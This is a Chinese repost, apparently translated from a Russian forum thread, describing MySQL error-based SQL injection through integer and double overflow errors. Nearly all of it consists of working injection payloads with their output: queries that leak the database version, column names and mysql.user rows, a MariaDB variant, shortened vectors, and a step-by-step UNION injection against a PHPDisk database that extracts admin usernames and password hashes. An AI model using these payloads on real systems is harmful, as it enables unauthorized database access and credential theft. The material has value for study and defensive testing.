又一种Mysql报错注入

from:https://rdot.org/forum/showthread.php?t=3167 

原文是俄文,所以只能大概的翻译一下 

这个报错注入主要基于Mysql的数据类型溢出(不适用于老版本的Mysql) 

mysql> SELECT 18446744073709551610 * 2; 
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in (18446744073709551610 * 2) 

mysql> SELECT -1 * 9223372036854775808; 
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in (-(1) * 9223372036854775808)

下面是一些利用例 

//爆数据裤版本 

mysql> SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610)); 

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in (2 * if((select 5.5 from dual),18446744073709551610,18446744073709551610)) 

// Вывод: 452 символа

//爆字段名称 

mysql> SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610);ERROR 

1690 (22003): BIGINT UNSIGNED value is out of range in (2 * if(((select `article`,`dealer`,`price` from (select `test`.`shop`.`article` AS `article`,`test`.`shop`.`dealer` AS `dealer`,`test`.`shop`.`price` AS `price` from `test`.`shop`) limit 1) > (select `test`.`shop`.`article`,`test`.`shop`.`dealer`,`test`.`shop`.`price` from `test`.`shop` limit 1)),18446744073709551610,18446744073709551610)) 

// Узнаем имена колонок в таблице

//爆字段值 

mysql> SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610); 

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in (2 * if(((select localhost,root,*,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,‘‘,‘‘,‘‘,‘‘,0,0,0,0,‘‘,‘‘ from dual limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2)),18446744073709551610,18446744073709551610)) 

// Выводим данные из всех колонок сразу

既然是报错注入,就还有另外一个东西是需要我们了解一下的。那就是Mysql的报错信息的长度: 

mysys/my_error.c: 

/* Max length of a error message. Should be kept in sync with MYSQL_ERRMSG_SIZE. */ 
#define ERRMSGSIZE      (512)

除此之外,还有一个问题需要提一下的是如果你使用的是MariaDB(Mysql的一个分之),在你试图这么做时,会发现并没有爆到想要的信息:

mysql> SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610)) 
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in (2 * if((select #),18446744073709551610,18446744073709551610))

对于MariaDB我们可以去这么解决: 

mysql> SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a; 
ERROR 1690 (22003): BIGINT value is out of range in ((5.5-MariaDB is not null) - -(9223372036854775808)) 

// Вывод: 475 символа

现在让我们试着缩短一下我们的Vector 


//查询数据库版本

SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610))

相当于 

select 1E308*if((select*from(select version())x),2,2)
SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a

相当于 

select if(x,2,2)*1E308 from(select version()x)y

//获取字段名称 

SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610)

相当于 

select 1E308*if((select*from(select*from mysql.user)``limit 1)>(select*from mysql.user limit 1),2,2)

//获取所有字段值 

SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610)

相当于 

select 1E308*if((select*from(select*from mysql.user LIMIT 1)``limit 1)<(select*from mysql.user limit 0),2,2) 

//获取指定字段值 

select 1E308*if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)

//获取字段个数 

select 1E308*if((select*from mysql.user limit 1)>(select 1),2,2)

其它

SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a

select 1E308*if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2); 
    => 
    select 2*if((select user|host|password|file_priv from(select*from mysql.user LIMIT 1)a limit 1),1e308,0);


mysql> select (select * from mysql.user)=1; 
    mysql> select (select * from mysql.user)in(1); 

    ERROR 1241 (21000): Operand should contain 42 column(s)


select 2*if((select user|host|password|file_priv from(select*from mysql.user LIMIT 1)a limit 1),1e308,0);


select if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)*1E308


SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a


select (x!=0x00)--9223372036854775808 from(SELECT version()x)y


mysql> select!x-~0.FROM(select+user()x)f; 
    ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in ((not(root@localhost)) - ~(0))

------------------------------------------------- 

自己试了一下,发现还挺好使的 也附上吧:

假设http://example.com/file.php?id=1 此处存在SQLi,我们想证明可以获取管理员账户密码 

1.先获取字段个数(在这里先用文中的方法代替,实战中由于表名是未知的,所以还是得一万个order by走起)

mysql> select * from pd_files where file_id=1 and (select 1E308*if((select*from pd_files limit 1)>(select 1),2,2)); 

ERROR 1241 (21000): Operand should contain 35 column(s)

2.确定字段个数后,老套路加新报错方法,爆出所有表

mysql> select * from pd_files where file_id=1 union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,2 * if((SELECT * from (select group_concat(table_name) from information_schema.table_constraints where constraint_schema=database() limit 1) as `` limit 1) < (1), 18446744073709551610, 18446744073709551610); 

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in (2 * if(((select pd_adminsession,pd_advertisements,pd_announces,pd_buddys,pd_categories,pd_comments,pd_cp_shortcut,pd_disk2user,pd_disks,pd_extracts,pd_file2tag,pd_files,pd_folders,pd_gallery,pd_groups,pd_invitelog,pd_langs,pd_links,pd_messages,pd_navigations,pd_orders,pd_plugins,pd_replys,pd_reports,pd_search_index,pd_servers,pd_settings,pd_stats,pd_tags,pd_templates,pd_topics,pd_users from dual limit 1) < 1),18446744073709551610,18446744073709551610))

3.发现可疑表名pd_users,初步假设pd_users为管理员表名。爆出该表所有字段:

mysql> select * from pd_files where file_id=1 union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,1E308*if((select*from(select*from pd_users)``limit 1)>(select*from pd_users limit 1),2,2); 

ERROR 1690 (22003): DOUBLE value is out of range in (1E308 * if(((select `userid`,`username`,`password`,`email`,`gid`,`reset_code`,`is_activated`,`is_locked`,`last_login_time`,`last_login_ip`,`reg_time`,`reg_ip`,`credit`,`wealth`,`rank`,`exp`,`accept_pm`,`show_email`,`space_pos`,`user_file_types`,`user_store_space`,`user_rent_space`,`space_day_credits`,`down_flow_count`,`view_flow_count`,`flow_reset_time`,`max_flow_down`,`max_flow_view` from (select `phpdisk`.`pd_users`.`userid` AS `userid`,`phpdisk`.`pd_users`.`username` AS 

4.获取关键字段值:

mysql> select * from pd_files where file_id=1 union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,1E308*if((select username||password from(select*from pd_users LIMIT 1)a limit 1),2,2); 

ERROR 1690 (22003): DOUBLE value is out of range in (1E308 * if((select (xsstest2<a>a or "xss123\/) from dual limit 1),2,2))

最后再验证一下 

mysql> select username,password from pd_users; 
+--------------+----------------------------------+ 
| username     | password                         | 
+--------------+----------------------------------+ 
| xsstest2<a>a | "xss123\/                       | 
| phpdisk_demo | fcf41657f02f88137a1bcf068a32c0a3 | 
| xsstest      | 44b22f2bf7c7cfa05c351a5bf228fee0 | 
+--------------+----------------------------------+ 
3 rows in set (0.00 sec)

 

又一种Mysql报错注入,古老的榕树,5-wow.com

郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。